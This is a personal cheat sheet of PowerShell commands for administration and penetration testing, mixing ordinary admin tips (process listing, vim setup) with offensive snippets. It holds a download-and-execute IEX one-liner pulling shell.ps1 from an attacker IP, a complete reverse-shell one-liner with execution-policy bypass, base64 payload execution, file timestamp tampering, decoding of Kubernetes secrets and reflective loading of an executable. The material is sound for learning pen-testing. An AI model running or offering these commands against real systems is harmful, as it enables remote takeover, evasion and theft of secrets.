PowerShell for Hackers

As I’m learning more PowerShell and dabbling into hacking I will be composing a list of techniques and scripts that I find very beneficial for administration and pen-testing.

Basics

ipconfig

Linux Like Watch Command

while (1) { docker ps -a ; sleep 5}

System Running Processes

Get-Process

IP to Hostname

[System.Net.Dns]::GetHostByAddress('192.168.0.10').HostName

Is Server Virtual or Physical?

systeminfo /s %computername% | findstr /c:"Model:" /c:"Host Name" /c:"OS Name"

Lookup User Information

# get domain information of a user
net user /domain jamie.bowman

# get groups of current user
whoami /groups

Change File Modified Date and Time

(dir sample_file.txt).LastWriteTime = New-object DateTime 1976,12,31

Find Apps Running on Port

# finds pids using port 53
Get-Process -Id (Get-NetTCPConnection -LocalPort 53).OwningProcess

# find pids listening on port 80
netstat -ano | findstr ":80"

# look up pids
tasklist | findstr "4"

Base64

# convert to base64
[Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('whoami'))
# d2hvYW1p

# convert from base64
[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p'))

# execute a base64 payload in powershell
powershell.exe -command "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p'))"

Querying Databases

https://gist.github.com/cmatskas/08411b916ab01e3f1439#file-powershellsqlquery-ps1

Domain Controllers

# get current domain name
$domainname = (Get-ADDomain).DNSRoot
 
# get all dcs
$dcs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem

Downloading Files with PowerShell

# powershell one-liner using System.Net.WebClient
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.26/shell.ps1', 'shell.ps1')

# powershell one-liner using Invoke-WebRequest
Invoke-WebRequest -Uri 'http://10.10.14.26/shell.ps1'-OutFile 'shell.ps1'

# download and invoke execution
IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26/shell.ps1')

PowerShell Reverse Shells

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell

Kubernetes

kubectl get secret/nameofsecret -o json | jq '.data | map_values(@base64d)'

Loading Executables in PowerShell

[Reflection.Assembly]::LoadFile("C:\Users\mrjamiebowman\Desktop\defnotmal.exe")
[DefNotMal.Program]::Main()

If you screw up and have to unload your assembly try closing PowerShell. When an assembly is loaded like this in PowerShell it’s loaded into the AppDomain and remains there for the lifecycle of PowerShell.

Windows Exploit Suggester

While this is a python script. You will need to get the system info using PowerShell/CMD.

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

systeminfo

Copy and paste the results into a file and then commands can easily be ran against Windows Exploit Suggester which will help with privilege escalation.

PowerShell Frameworks & Tools

These are proven frameworks that can be used to reliably exploit a Windows environment.

Using Vim with PowerShell

First, you’ll need to install Vim. Download, run and install the file “gvim82.exe” (as of 02/06/2020)…

https://www.vim.org/download.php#pc

Once Vim is installed you’ll need to run PowerShell in Administrator mode to configure the integration.

# install
Install-Package -Name PSReadline -Force -SkipPublisherCheck

# create aliases
New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'
New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe'

# vim edit mode
Set-PSReadlineOption -EditMode vi -BellStyle None

You can learn more from this article.
https://codeandkeep.com/PowerShell-And-Vim/